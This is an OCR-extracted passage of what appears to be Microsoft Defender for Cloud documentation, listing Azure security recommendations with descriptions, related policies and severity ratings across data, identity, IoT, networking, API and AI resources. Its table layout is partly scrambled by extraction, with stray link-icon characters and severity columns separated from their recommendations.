Configure a private endpoint connection to enable access to 
traffic coming only from known networks and prevent access 
from all other IP addresses, including within Azure. 

(Related policy: Private endpoint should be enabled for 
MariaDB servers £) 


Private endpoint connections enforce secure communication 
by enabling private connectivity to Azure Database for MySQL. 
Configure a private endpoint connection to enable access to 
traffic coming only from known networks and prevent access 
from all other IP addresses, including within Azure. 

(Related policy: Private endpoint should be enabled for MySQL 
servers) 


Private endpoint connections enforce secure communication 
by enabling private connectivity to Azure Database for 
PostgreSQL. 

Configure a private endpoint connection to enable access to 
traffic coming only from known networks and prevent access 
from all other IP addresses, including within Azure. 

(Related policy: Private endpoint should be enabled for 
PostgreSQL servers %) 


Disabling the public network access property improves security 
by ensuring your Azure SQL Database can only be accessed 
from a private endpoint. This configuration denies all logins 
that match IP or virtual network based firewall rules. 

(Related policy: Public network access on Azure SQL Database 
should be disabled Z ) 


This policy audits any Cognitive Services account in your 
environment with public network access enabled. Public 
network access should be disabled so that only connections 
from private endpoints are allowed. 

(Related policy: Public network access should be disabled for 
Cognitive Services accounts  ) 


Severity 


Medium 


Medium 


Medium 


Medium 


Medium 


Medium 


Recommendation 


Public network 
access should be 
disabled for MariaDB 
servers E 


Public network 
access should be 
disabled for MySQL 
servers E 


Public network 
access should be 
disabled for 
PostgreSQL servers E 


Redis Cache should 
allow access only via 
SSL? 


SQL databases 
should have 
vulnerability findings 
resolved Z 


SQL managed 
instances should 
have vulnerability 


Description Severity 


Disable the public network access property to improve security Medium 
and ensure your Azure Database for MariaDB can only be 

accessed from a private endpoint. This configuration strictly 

disables access from any public address space outside of Azure 

IP range, and denies all logins that match IP or virtual network- 

based firewall rules. 

(Related policy: Public network access should be disabled for 


MariaDB servers £) 


Disable the public network access property to improve security Medium 
and ensure your Azure Database for MySQL can only be 

accessed from a private endpoint. This configuration strictly 

disables access from any public address space outside of Azure 

IP range, and denies all logins that match IP or virtual network- 

based firewall rules. 

(Related policy: Public network access should be disabled for 


MySQL servers % ) 


Disable the public network access property to improve security Medium 
and ensure your Azure Database for PostgreSQL can only be 

accessed from a private endpoint. This configuration disables 

access from any public address space outside of Azure IP 

range, and denies all logins that match IP or virtual network- 

based firewall rules. 

(Related policy: Public network access should be disabled for 


PostgreSQL servers £) 


Enable only connections via SSL to Redis Cache. Use of secure High 
connections ensures authentication between the server and 

the service and protects data in transit from network layer 

attacks such as man-in-the-middle, eavesdropping, and 
session-hijacking. 

(Related policy: Only secure connections to your Azure Cache 

for Redis should be enabled Z) 


SQL Vulnerability assessment scans your database for security High 
vulnerabilities, and exposes any deviations from best practices 

such as misconfigurations, excessive permissions, and 

unprotected sensitive data. Resolving the vulnerabilities found 

can greatly improve your database security posture. Learn 

more E 

(Related policy: Vulnerabilities on your SQL databases should 


be remediated tz 


Vulnerability assessment can discover, track, and help you High 
remediate potential database vulnerabilities. 
(Related policy: Vulnerability assessment should be enabled on 


SQL Managed Instance  ) 


Recommendation 


assessment 
configured Z 


SQL servers on 
machines should 
have vulnerability 
findings resolved 7 


SQL servers should 
have an Azure Active 
Directory 
administrator 
provisioned č 


SQL servers should 
have vulnerability 
assessment 
configured Z 


Storage account 
should use a private 
link connection Z 


Storage accounts 
should be migrated 
to new Azure 
Resource Manager 
resources E 


Storage accounts 
should restrict 
network access using 
virtual network rules £ 


Description Severity 


SQL Vulnerability assessment scans your database for security High 
vulnerabilities, and exposes any deviations from best practices 

such as misconfigurations, excessive permissions, and 

unprotected sensitive data. Resolving the vulnerabilities found 

can greatly improve your database security posture. Learn 

more £ 

(Related policy: Vulnerabilities on your SQL servers on machine 


should be remediated Z ) 


Provision an Azure AD administrator for your SQL server to High 
enable Azure AD authentication. Azure AD authentication 

enables simplified permission management and centralized 

identity management of database users and other Microsoft 

services. 

(Related policy: An Azure Active Directory administrator should 


be provisioned for SQL servers £) 


Vulnerability assessment can discover, track, and help you High 
remediate potential database vulnerabilities. 
(Related policy: Vulnerability assessment should be enabled on 


your SQL servers E) 


Private links enforce secure communication, by providing Medium 
private connectivity to the storage account 
(Related policy: Storage account should use a private link 


connection £) 


To benefit from new capabilities in Azure Resource Manager, Low 
you can migrate existing deployments from the Classic 

deployment model. Resource Manager enables security 
enhancements such as: stronger access control (RBAC), better 
auditing, ARM-based deployment and governance, access to 
managed identities, access to key vault for secrets, Azure AD- 

based authentication and support for tags and resource 

groups for easier security management. Learn more 

(Related policy: Storage accounts should be migrated to new 


Azure Resource Manager resources £) 


Protect your storage accounts from potential threats using Medium 
virtual network rules as a preferred method instead of IP- 

based filtering. Disabling IP-based filtering prevents public IPs 

from accessing your storage accounts. 

(Related policy: Storage accounts should restrict network 


access using virtual network rules £ ) 


Recommendation 


Subscriptions should 
have a contact email 
address for security 
issues E 


Transparent Data 
Encryption on SQL 
databases should be 
enabled Z 


VM Image Builder 
templates should use 
private link Z 


Web Application 
Firewall (WAF) 
should be enabled 
for Application 
Gateway @ 


Web Application 
Firewall (WAF) 
should be enabled 
for Azure Front Door 
Service service E 


Description 


To ensure the relevant people in your organization are notified 
when there is a potential security breach in one of your 
subscriptions, set a security contact to receive email 
notifications from Defender for Cloud. 

(Related policy: Subscriptions should have a contact email 
address for security issues | 


Enable transparent data encryption to protect data-at-rest and 
meet compliance requirements 

(Related policy: Transparent Data Encryption on SQL databases 
should be enabled Z) 


Audit VM Image Builder templates that do not have a virtual 
network configured. When a virtual network is not configured, 
a public IP is created and used instead, which may directly 
expose resources to the internet and increase the potential 
attack surface. 

(Related policy: VM Image Builder templates should use 
private link 7) 


Deploy Azure Web Application Firewall (WAF) in front of public 
facing web applications for additional inspection of incoming 
traffic. Web Application Firewall (WAF) provides centralized 
protection of your web applications from common exploits 
and vulnerabilities such as SQL injections, Cross-Site Scripting, 
local and remote file executions. You can also restrict access to 
your web applications by countries/regions, IP address ranges, 
and other http(s) parameters via custom rules. 

(Related policy: Web Application Firewall (WAF) should be 
enabled for Application Gateway E) 


Deploy Azure Web Application Firewall (WAF) in front of public 
facing web applications for additional inspection of incoming 
traffic. Web Application Firewall (WAF) provides centralized 
protection of your web applications from common exploits 
and vulnerabilities such as SQL injections, Cross-Site Scripting, 
local and remote file executions. You can also restrict access to 
your web applications by countries/regions, IP address ranges, 
and other http(s) parameters via custom rules. 

(Related policy: Web Application Firewall (WAF) should be 
enabled for Azure Front Door Service?service ) 


IdentityAndAccess recommendations 


There are 29 recommendations in this category. 


Severity 


Low 


Low 


Medium 


Low 


Low 


Recommendation 


A maximum of 3 
owners should be 
designated for 
subscriptions Z 


Accounts with owner 
permissions on Azure 
resources should be 
MFA enabled 7 


Accounts with read 
permissions on Azure 
resources should be 
MFA enabled Z 


Accounts with write 
permissions on Azure 
resources should be 
MFA enabled Z 


Description 


To reduce the potential for breaches by compromised owner 
accounts, we recommend limiting the number of owner 
accounts to a maximum of 3 

(Related policy: A maximum of 3 owners should be 
designated for your subscription “) 


If you only use passwords to authenticate your users, you 
are leaving an attack vector open. Users often use weak 
passwords for multiple services. By enabling Multi-Factor 
Authentication (MFA), you provide better security for your 
accounts, while still allowing your users to authenticate to 
almost any application with single sign-on (SSO). Multi- 
factor authentication is a process by which users are 
prompted, during the sign-in process, for an additional form 
of identification. For example, a code may be sent to their 
cellphone, or they may be asked for a fingerprint scan. We 
recommend you to enable MFA for all accounts that have 
owner permissions on Azure resources, to prevent breach 
and attacks. 

More details and frequently asked questions are available 
here: Manage multi-factor authentication (MFA) 
enforcement on your subscriptions 

(No related policy) 


If you only use passwords to authenticate your users, you 
are leaving an attack vector open. Users often use weak 
passwords for multiple services. By enabling Multi-Factor 
Authentication (MFA), you provide better security for your 
accounts, while still allowing your users to authenticate to 
almost any application with single sign-on (SSO). Multi- 
factor authentication is a process by which users are 
prompted, during the sign-in process, for an additional form 
of identification. For example, a code may be sent to their 
cellphone, or they may be asked for a fingerprint scan. We 
recommend you to enable MFA for all accounts that have 
read permissions on Azure resources, to prevent breach and 
attacks. 

More details and frequently asked questions are available 
here: Manage multi-factor authentication (MFA) 
enforcement on your subscriptions 

(No related policy) 


If you only use passwords to authenticate your users, you 
are leaving an attack vector open. Users often use weak 
passwords for multiple services. By enabling Multi-Factor 
Authentication (MFA), you provide better security for your 
accounts, while still allowing your users to authenticate to 
almost any application with single sign-on (SSO). Multi- 


Severity 


High 


High 


High 


High 


Recommendation 


Azure Cosmos DB 
accounts should use 
Azure Active Directory 
as the only 
authentication method ¢ 


Blocked accounts with 
owner permissions on 
Azure resources should 
be removed Z 


Blocked accounts with 
read and write 
permissions on Azure 
resources should be 
remove E 


Deprecated accounts 
should be removed 
from subscriptions E 


Deprecated accounts 
with owner permissions 
should be removed 
from subscriptions E 


Description 


factor authentication is a process by which users are 
prompted, during the sign-in process, for an additional form 
of identification. For example, a code may be sent to their 
cellphone, or they may be asked for a fingerprint scan. We 
recommend you to enable MFA for all accounts that have 
write permissions on Azure resources, to prevent breach and 
attacks. 

More details and frequently asked questions are available 
here: Manage multi-factor authentication (MFA) 
enforcement on your subscriptions 

(No related policy) 


The best way to authenticate to Azure services is by using 
Role-Based Access Control (RBAC). RBAC allows you to 
maintain the minimum privilege principle and supports the 
ability to revoke permissions as an effective method of 
response when compromised. You can configure your Azure 
Cosmos DB account to enforce RBAC as the only 
authentication method. When the enforcement is 
configured, all other methods of access will be denied 
(primary/secondary keys and access tokens). 

(No related policy) 


Accounts that have been blocked from signing in on Active 
Directory, should be removed from your Azure resources. 
These accounts can be targets for attackers looking to find 
ways to access your data without being noticed. 

(No related policy) 


Accounts that have been blocked from signing in on Active 
Directory, should be removed from your Azure resources. 
These accounts can be targets for attackers looking to find 
ways to access your data without being noticed. 

(No related policy) 


User accounts that have been blocked from signing in, 
should be removed from your subscriptions. 

These accounts can be targets for attackers looking to find 
ways to access your data without being noticed. 

(Related policy: Deprecated accounts should be removed 
from your subscription £) 


User accounts that have been blocked from signing in, 
should be removed from your subscriptions. 

These accounts can be targets for attackers looking to find 
ways to access your data without being noticed. 

(Related policy: Deprecated accounts with owner 
permissions should be removed from your subscription Z ) 


Severity 


Medium 


High 


High 


High 


High 


Recommendation 


Diagnostic logs in Key 
Vault should be 
enabled 7 


External accounts with 
owner permissions 
should be removed 
from subscriptions E 


External accounts with 
read permissions 
should be removed 
from subscriptions E 


External accounts with 
write permissions 
should be removed 
from subscriptions E 


Firewall should be 
enabled on Key Vault Z 


Guest accounts with 
owner permissions on 
Azure resources should 
be removed tz 


Description 


Enable logs and retain them for up to a year. This enables 
you to recreate activity trails for investigation purposes 
when a security incident occurs or your network is 
compromised. 

(Related policy: Diagnostic logs in Key Vault should be 
enabled Z) 


Accounts with owner permissions that have different domain 
names (external accounts), should be removed from your 
subscription. This prevents unmonitored access. These 
accounts can be targets for attackers looking to find ways to 
access your data without being noticed. 

(Related policy: External accounts with owner permissions 
should be removed from your subscription £ ) 


Accounts with read permissions that have different domain 
names (external accounts), should be removed from your 
subscription. This prevents unmonitored access. These 
accounts can be targets for attackers looking to find ways to 
access your data without being noticed. 

(Related policy: External accounts with read permissions 
should be removed from your subscription £ ) 


Accounts with write permissions that have different domain 
names (external accounts), should be removed from your 
subscription. This prevents unmonitored access. These 
accounts can be targets for attackers looking to find ways to 
access your data without being noticed. 

(Related policy: External accounts with write permissions 
should be removed from your subscription £ ) 


Key vault's firewall prevents unauthorized traffic from 
reaching your key vault and provides an additional layer of 
protection for your secrets. Enable the firewall to make sure 
that only traffic from allowed networks can access your key 
vault. 

(Related policy: Firewall should be enabled on Key Vault £ ) 


Accounts with owner permissions that have been 
provisioned outside of the Azure Active Directory tenant 
(different domain names), should be removed from your 
Azure resources.Guest accounts are not managed to the 
same standards as enterprise tenant identities. These 
accounts can be targets for attackers looking to find ways to 
access your data without being noticed. 

(No related policy) 


Severity 


Low 


High 


High 


High 


Medium 


High 


Recommendation 


Guest accounts with 
read permissions on 
Azure resources should 
be removed tz 


Guest accounts with 
write permissions on 
Azure resources should 
be removed & 


Key Vault keys should 


have an expiration date 7 


Key Vault secrets 
should have an 
expiration date 7 


Key vaults should have 
purge protection 
enabled Z 


Key vaults should have 
soft delete enabled 7 


Description 


Accounts with read permissions that have been provisioned 
outside of the Azure Active Directory tenant (different 
domain names), should be removed from your Azure 
resources.Guest accounts are not managed to the same 
standards as enterprise tenant identities. These accounts can 
be targets for attackers looking to find ways to access your 
data without being noticed. 

(No related policy) 


Accounts with write permissions that have been provisioned 
outside of the Azure Active Directory tenant (different 
domain names), should be removed from your Azure 
resources.Guest accounts are not managed to the same 
standards as enterprise tenant identities. These accounts can 
be targets for attackers looking to find ways to access your 
data without being noticed. 

(No related policy) 


Cryptographic keys should have a defined expiration date 
and not be permanent. Keys that are valid forever provide a 
potential attacker with more time to compromise the key. It 
is a recommended security practice to set expiration dates 
on cryptographic keys. 

(Related policy: Key Vault keys should have an expiration 
date Z) 


Secrets should have a defined expiration date and not be 
permanent. Secrets that are valid forever provide a potential 
attacker with more time to compromise them. It is a 
recommended security practice to set expiration dates on 
secrets. 

(Related policy: Key Vault secrets should have an expiration 
date 7) 


Malicious deletion of a key vault can lead to permanent data 
loss. A malicious insider in your organization can potentially 
delete and purge key vaults. Purge protection protects you 
from insider attacks by enforcing a mandatory retention 
period for soft deleted key vaults. No one inside your 
organization or Microsoft will be able to purge your key 
vaults during the soft delete retention period. 

(Related policy: Key vaults should have purge protection 
enabled 7) 


Deleting a key vault without soft delete enabled 
permanently deletes all secrets, keys, and certificates stored 
in the key vault. Accidental deletion of a key vault can lead 
to permanent data loss. Soft delete allows you to recover an 


Severity 


High 


High 


High 


High 


Medium 


High 


Recommendation 


MFA should be enabled 
on accounts with 
owner permissions on 
subscriptions E 


MFA should be enabled 
on accounts with read 
permissions on 
subscriptions Z 


MFA should be enabled 
on accounts with write 
permissions on 
subscriptions E 


Microsoft Defender for 
Key Vault should be 
enabled Z 


Private endpoint 
should be configured 
for Key Vault Z 


Storage account public 
access should be 


Description 


accidentally deleted key vault for a configurable retention 
period. 

(Related policy: Key vaults should have soft delete 
enabled £) 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with owner permissions to prevent a 
breach of accounts or resources. 

(Related policy: MFA should be enabled on accounts with 
owner permissions on your subscription £) 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with read privileges to prevent a 
breach of accounts or resources. 

(Related policy: MFA should be enabled on accounts with 
read permissions on your subscription £) 


Multi-Factor Authentication (MFA) should be enabled for all 
subscription accounts with write privileges to prevent a 
breach of accounts or resources. 

(Related policy: MFA should be enabled accounts with write 
permissions on your subscription £ ) 


Microsoft Defender for Cloud includes Microsoft Defender 
for Key Vault, providing an additional layer of security 
intelligence. 

Microsoft Defender for Key Vault detects unusual and 
potentially harmful attempts to access or exploit Key Vault 
accounts. 

Important: Protections from this plan are charged as shown 
on the Defender plans page. If you don't have any key 
vaults in this subscription, you won't be charged. If you later 
create key vaults on this subscription, they'll automatically 
be protected and charges will begin. Learn about the pricing 
details per region”. 

Learn more in Introduction to Microsoft Defender for Key 
Vault. 

(Related policy: Azure Defender for Key Vault should be 
enabled Z) 


Private link provides a way to connect Key Vault to your 
Azure resources without sending traffic over the public 
internet. Private link provides defense in depth protection 
against data exfiltration. 

(Related policy: Private endpoint should be configured for 
Key Vault Z ) 


Anonymous public read access to containers and blobs in 
Azure Storage is a convenient way to share data, but might 


Severity 


High 


High 


High 


High 


Medium 


Medium 


Recommendation 


disallowed Z 


There should be more 
than one owner 
assigned to 
subscriptions Z 


Validity period of 
certificates stored in 
Azure Key Vault should 
not exceed 12 months € 


Description 


present security risks. To prevent data breaches caused by 
undesired anonymous access, Microsoft recommends 
preventing public access to a storage account unless your 
scenario requires it. 

(Related policy: Storage account public access should be 
disallowed £Z) 


Designate more than one subscription owner in order to 
have administrator access redundancy. 

(Related policy: There should be more than one owner 
assigned to your subscription Z ) 


Ensure your certificates do not have a validity period that 
exceeds 12 months. 

(Related policy: Certificates should have the specified 
maximum validity period £ ) 


loT recommendations 


There are 4 recommendations in this category. 


Recommendation 


Default IP Filter Policy 
should be Deny Z 


Diagnostic logs in loT 
Hub should be enabled Z 


Identical Authentication 
Credentials 7 


IP Filter rule large IP 
range E 


Description 


IP Filter Configuration should have rules defined for 
allowed traffic and should deny all other traffic by default 
(No related policy) 


Enable logs and retain them for up to a year. This enables 
you to recreate activity trails for investigation purposes 
when a security incident occurs or your network is 
compromised. 

(Related policy: Diagnostic logs in loT Hub should be 
enabled £) 


Identical authentication credentials to the loT Hub used by 
multiple devices. This could indicate an illegitimate device 
impersonating a legitimate device. It also exposes the risk 
of device impersonation by an attacker 

(No related policy) 


An Allow IP Filter rule's source IP range is too large. Overly 
permissive rules might expose your loT hub to malicious 
intenders 

(No related policy) 


Severity 


High 


Medium 


Severity 


Medium 


Low 


High 


Medium 


Networking recommendations 


There are 13 recommendations in this category. 


Recommendation 


Access to storage 
accounts with firewall 
and virtual network 
configurations should be 
restricted 2 


Adaptive network 
hardening 
recommendations should 
be applied on internet 
facing virtual machines 7 


All network ports should 
be restricted on network 
security groups 
associated to your virtual 
machine Z 


Azure DDoS Protection 
Standard should be 
enabled Z 


Description 


Review the settings of network access in your storage 
account firewall settings. We recommended configuring 
network rules so that only applications from allowed 
networks can access the storage account. To allow 
connections from specific internet or on-premise clients, 
access can be granted to traffic from specific Azure virtual 
networks or to public internet IP address ranges. 

(Related policy: Storage accounts should restrict network 
access £) 


Defender for Cloud has analyzed the internet traffic 
communication patterns of the virtual machines listed 
below, and determined that the existing rules in the NSGs 
associated to them are overly-permissive, resulting in an 
increased potential attack surface. 

This typically occurs when this IP address doesn't 
communicate regularly with this resource. Alternatively, 
the IP address has been flagged as malicious by Defender 
for Cloud's threat intelligence sources. Learn more in 
Improve your network security posture with adaptive 
network hardening. 

(Related policy: Adaptive network hardening 
recommendations should be applied on internet facing 
virtual machines Z ) 


Defender for Cloud has identified some of your network 
security groups’ inbound rules to be too permissive. 
Inbound rules should not allow access from A or 
‘Internet’ ranges. This can potentially enable attackers to 
target your resources. 

(Related policy: All network ports should be restricted on 
network security groups associated to your virtual 
machine @ ) 


Defender for Cloud has discovered virtual networks with 
Application Gateway resources unprotected by the DDoS 
protection service. These resources contain public IPs. 
Enable mitigation of network volumetric and protocol 
attacks. 

(Related policy: Azure DDoS Protection Standard should 
be enabled Z) 


Severity 


Low 


High 


High 


Medium 


Recommendation 


Internet-facing virtual 
machines should be 
protected with network 
security groups E 


IP forwarding on your 
virtual machine should 
be disabled 7 


Machines should have 
ports closed that might 
expose attack vectors E 


Management ports of 
virtual machines should 
be protected with just-in- 
time network access 
control Z 


Management ports 
should be closed on your 
virtual machines 4 


Non-internet-facing 
virtual machines should 


Description 


Protect your VM from potential threats by restricting 
access to it with a network security group (NSG). NSGs 
contain a list of Access Control List (ACL) rules that allow 
or deny network traffic to your VM from other instances, 
in or outside the same subnet. 

To keep your machine as secure as possible, the VM access 
to the internet must be restricted and an NSG should be 
enabled on the subnet. 

VMs with ‘High’ severity are internet-facing VMs. 

(Related policy: Internet-facing virtual machines should be 
protected with network security groups £) 


Defender for Cloud has discovered that IP forwarding is 
enabled on some of your virtual machines. Enabling IP 
forwarding on a virtual machine's NIC allows the machine 
to receive traffic addressed to other destinations. IP 
forwarding is rarely required (e.g., when using the VM as a 
network virtual appliance), and therefore, this should be 
reviewed by the network security team. 

(Related policy: IP Forwarding on your virtual machine 
should be disabled ) 


Azure's terms of use % prohibit the use of Azure services 
in ways that could damage, disable, overburden, or impair 
any Microsoft server or the network. This recommendation 
lists exposed ports that need to be closed for your 
continued security. It also illustrates the potential threat to 
each port. 

(No related policy) 


Defender for Cloud has identified some overly-permissive 
inbound rules for management ports in your Network 
Security Group. Enable just-in-time access control to 
protect your VM from internet-based brute-force attacks. 
Learn more in Understanding just-in-time (JIT) VM access. 
(Related policy: Management ports of virtual machines 
should be protected with just-in-time network access 
control £) 


Open remote management ports are exposing your VM to 
a high level of risk from Internet-based attacks. These 
attacks attempt to brute force credentials to gain admin 
access to the machine. 

(Related policy: Management ports should be closed on 
your virtual machines “) 


Protect your non-internet-facing virtual machine from 
potential threats by restricting access to it with a network 


Severity 


High 


Medium 


High 


High 


Medium 


Low 


Recommendation Description Severity 


be protected with security group (NSG). NSGs contain a list of Access Control 
network security groups? List (ACL) rules that allow or deny network traffic to your 
VM from other instances, whether or not they're on the 
same subnet. 
Note that to keep your machine as secure as possible, the 
VM's access to the internet must be restricted and an NSG 
should be enabled on the subnet. 
(Related policy: Non-internet-facing virtual machines 
should be protected with network security groups £ ) 


Secure transfer to Secure transfer is an option that forces your storage High 
storage accounts should account to accept requests only from secure connections 
be enabled 7 (HTTPS). Use of HTTPS ensures authentication between 
the server and the service and protects data in transit from 
network layer attacks such as man-in-the-middle, 
eavesdropping, and session-hijacking. 
(Related policy: Secure transfer to storage accounts should 
be enabled Z) 


Subnets should be Protect your subnet from potential threats by restricting Low 

associated with a access to it with a network security group (NSG). NSGs 

network security group contain a list of Access Control List (ACL) rules that allow 
or deny network traffic to your subnet. When an NSG is 
associated with a subnet, the ACL rules apply to all the VM 
instances and integrated services in that subnet, but don't 
apply to internal traffic inside the subnet. To secure 
resources in the same subnet from one another, enable 
NSG directly on the resources as well. 
Note that the following subnet types will be listed as not 
applicable: GatewaySubnet, AzureFirewallSubnet, 
AzureBastionSubnet. 
(Related policy: Subnets should be associated with a 
Network Security Group £ ) 


Virtual networks should Some of your virtual networks aren't protected with a Low 
be protected by Azure firewall. Use Azure Firewall to restrict access to your virtual 
Firewall Z networks and prevent potential threats. Learn more about 


Azure Firewall”. 
(Related policy: All Internet traffic should be routed via 
your deployed Azure Firewall Z) 


API recommendations 


Recommendation Description & related policy Severity 
(Preview) Microsoft Enable the Defender for APIs plan to discover and protect High 
Defender for APIs should API resources against attacks and security 
be enabled misconfigurations. Learn more 
(Preview) Azure API Onboarding APIs to Defender for APIs requires compute High 
Management APIs and memory utilization on the Azure API Management 
should be onboarded to service. Monitor performance of your Azure API 
Defender for APIs. Management service while onboarding APIs, and scale out 
your Azure API Management resources as needed. 
(Preview) API endpoints As a security best practice, API endpoints that haven't Low 
that are unused should received traffic for 30 days are considered unused, and 
be disabled and removed should be removed from the Azure API Management 
from the Azure API service. Keeping unused API endpoints might pose a 
Management service security risk. These might be APIs that should have been 
deprecated from the Azure API Management service, but 
have accidentally been left active. Such APIs typically do 
not receive the most up-to-date security coverage. 
(Preview) API endpoints API endpoints published within Azure API Management High 
in Azure API should enforce authentication to help minimize security 
Management should be risk. Authentication mechanisms are sometimes 
authenticated implemented incorrectly or are missing. This allows 
attackers to exploit implementation flaws and to access 
data. For APIs published in Azure API Management, this 
recommendation assesses the execution of authentication 
via the Subscription Keys, JWT, and Client Certificate 
configured within Azure API Management. If none of these 
authentication mechanisms are executed during the API 
call, the API will receive this recommendation. 
API management recommendations 
Recommendation Description & related policy Severity 
(Preview) API Management API Management subscriptions should be scoped to a Medium 
subscriptions should not be product or an individual API instead of all APIs, which 
scoped to all APIs could result in excessive data exposure. 
(Preview) API Management API Management should validate the backend server Medium 


calls to API backends certificate for all API calls. Enable SSL certificate 


should not bypass thumbprint and name validation to improve the API 
certificate thumbprint or security. 


name validation 


Recommendation 


(Preview) API Management 
direct management 
endpoint should not be 
enabled 


(Preview) API Management 
APIs should use only 
encrypted protocols 


(Preview) API Management 
secret named values should 


be stored in Azure Key Vault 


(Preview) API Management 
should disable public 
network access to the 
service configuration 
endpoints 


(Preview) API Management 
minimum API version 
should be set to 2019-12- 
01 or higher 


(Preview) API Management 
calls to API backends 
should be authenticated 


Description & related policy 


The direct management REST API in Azure API 
Management bypasses Azure Resource Manager role- 
based access control, authorization, and throttling 
mechanisms, thus increasing the vulnerability of your 
service. 


APIs should be available only through encrypted 
protocols, like HTTPS or WSS. Avoid using unsecured 
protocols, such as HTTP or WS to ensure security of 
data in transit. 


Named values are a collection of name and value pairs 
in each API Management service. Secret values can be 
stored either as encrypted text in API Management 
(custom secrets) or by referencing secrets in Azure Key 
Vault. Reference secret named values from Azure Key 
Vault to improve security of API Management and 
secrets. Azure Key Vault supports granular access 
management and secret rotation policies. 


To improve the security of API Management services, 
restrict connectivity to service configuration endpoints, 
like direct access management API, Git configuration 
management endpoint, or self-hosted gateways 
configuration endpoint. 


To prevent service secrets from being shared with read- 
only users, the minimum API version should be set to 
2019-12-01 or higher. 


Calls from API Management to backends should use 
some form of authentication, whether via certificates or 
credentials. Does not apply to Service Fabric backends. 


Al recommendations 


Recommendation 


Resource logs in Azure 
Machine Learning 
Workspaces should be 
enabled (Preview) 


Azure Machine Learning 
Workspaces should disable 


Description & related policy 


Resource logs enable recreating activity trails to use for 
investigation purposes when a security incident occurs 
or when your network is compromised. 


Disabling public network access improves security by 
ensuring that the Machine Learning Workspaces aren't 
exposed on the public internet. You can control 


Severity 


Low 


High 


Medium 


Medium 


Medium 


Medium 


Severity 


Medium 


Medium 


Recommendation 


public network access 
(Preview) 


Azure Machine Learning 
Computes should be ina 
virtual network (Preview) 


Azure Machine Learning 
Computes should have 
local authentication 
methods disabled 
(Preview) 


Azure Machine Learning 
compute instances should 
be recreated to get the 
latest software updates 
(Preview) 


Resource logs in Azure 
Databricks Workspaces 
should be enabled 
(Preview) 


Azure Databricks 
Workspaces should disable 
public network access 
(Preview) 


Azure Databricks Clusters 
should disable public IP 
(Preview) 


Azure Databricks 
Workspaces should be in a 
virtual network (Preview) 


Description & related policy Severity 


exposure of your workspaces by creating private 
endpoints instead. For more information, see Configure 
a private endpoint for an Azure Machine Learning 
workspace. 


Azure Virtual Networks provide enhanced security and Medium 
isolation for your Azure Machine Learning Compute 

Clusters and Instances, as well as subnets, access control 

policies, and other features to further restrict access. 

When a compute is configured with a virtual network, it 

is not publicly addressable and can only be accessed 

from virtual machines and applications within the virtual 


network. 


Disabling local authentication methods improves Medium 
security by ensuring that Machine Learning Computes 

require Azure Active Directory identities exclusively for 
authentication. For more information, see Azure Policy 

Regulatory Compliance controls for Azure Machine 


Learning. 


Ensure Azure Machine Learning compute instances run Medium 
on the latest available operating system. Security is 

improved and vulnerabilities reduced by running with 

the latest security patches. For more information, see 


Vulnerability management for Azure Machine Learning. 


Resource logs enable recreating activity trails to use for Medium 
investigation purposes when a security incident occurs 


or when your network is compromised. 


Disabling public network access improves security by Medium 
ensuring that the resource isn't exposed on the public 

internet. You can control exposure of your resources by 

creating private endpoints instead. For more 


information, see Enable Azure Private Link. 


Disabling public IP of clusters in Azure Databricks Medium 
Workspaces improves security by ensuring that the 
clusters aren't exposed on the public internet. For more 


information, see Secure cluster connectivity. 


Azure Virtual Networks provide enhanced security and Medium 
isolation for your Azure Databricks Workspaces, as well 

as subnets, access control policies, and other features to 

further restrict access. For more information, see Deploy 


Azure Databricks in your Azure virtual network. 


Recommendation 


Azure Databricks 
Workspaces should use 
private link (Preview) 


Description & related policy 


Azure Private Link lets you connect your virtual networks 
to Azure services without a public IP address at the 
source or destination. The Private Link platform handles 


the connectivity between the consumer and services 


over the Azure backbone network. By mapping private 


endpoints to Azure Databricks workspaces, you can 


reduce data leakage risks. For more information, see 


Create the workspace and private endpoints in the Azure 


portal Ul. 


Deprecated recommendations 


Recommendation 


Access to App Services should be 
restricted 


The rules for web applications on 
laaS NSGs should be hardened 


Pod Security Policies should be 
defined to reduce the attack vector 
by removing unnecessary 
application privileges (Preview) 


Install Azure Security Center for loT 
security module to get more 
visibility into your loT devices 


Your machines should be restarted 
to apply system updates 


Monitoring agent should be 
installed on your machines 


Description & related policy 


Restrict access to your App Services by changing 
the networking configuration, to deny inbound 
traffic from ranges that are too broad. 

(Related policy: [Preview]: Access to App 
Services should be restricted) 


Harden the network security group (NSG) of 
your virtual machines that are running web 
applications, with NSG rules that are overly 
permissive with regard to web application ports. 
(Related policy: The NSGs rules for web 
applications on laaS should be hardened) 


Define Pod Security Policies to reduce the attack 
vector by removing unnecessary application 
privileges. It is recommended to configure pod 
security policies so pods can only access 
resources which they are allowed to access. 
(Related policy: [Preview]: Pod Security Policies 
should be defined on Kubernetes Services) 


Install Azure Security Center for loT security 
module to get more visibility into your loT 
devices. 


Restart your machines to apply the system 
updates and secure the machine from 
vulnerabilities. (Related policy: System updates 
should be installed on your machines) 


This action installs a monitoring agent on the 
selected virtual machines. Select a workspace for 


Severity 


Medium 


Severity 


High 


High 


Medium 


Low 


Medium 


High 


Recommendation 


Java should be updated to the 
latest version for web apps 


Python should be updated to the 
latest version for function apps 


Python should be updated to the 
latest version for web apps 


Java should be updated to the 
latest version for function apps 


PHP should be updated to the 
latest version for web apps 


Description & related policy 


the agent to report to. (No related policy) 


Periodically, newer versions are released for Java 
software either due to security flaws or to 
include additional functionality. 

Using the latest Java version for web apps is 
recommended to benefit from security fixes, if 
any, and/or new functionalities of the latest 
version. 

(Related policy: Ensure that Java version’ is the 
latest, if used as a part of the Web app) 


Periodically, newer versions are released for 
Python software either due to security flaws or 
to include additional functionality. 

Using the latest Python version for function 
apps is recommended to benefit from security 
fixes, if any, and/or new functionalities of the 
latest version. 

(Related policy: Ensure that ‘Python version’ is 
the latest, if used as a part of the Function app) 


Periodically, newer versions are released for 
Python software either due to security flaws or 
to include additional functionality. 

Using the latest Python version for web apps is 
recommended to benefit from security fixes, if 
any, and/or new functionalities of the latest 
version. 

(Related policy: Ensure that ‘Python version’ is 
the latest, if used as a part of the Web app) 


Periodically, newer versions are released for Java 
software either due to security flaws or to 
include additional functionality. 

Using the latest Java version for function apps is 
recommended to benefit from security fixes, if 
any, and/or new functionalities of the latest 
version. 

(Related policy: Ensure that Java version’ is the 
latest, if used as a part of the Function app) 


Periodically, newer versions are released for PHP 
software either due to security flaws or to 
include additional functionality. 

Using the latest PHP version for web apps is 
recommended to benefit from security fixes, if 
any, and/or new functionalities of the latest 
version. 


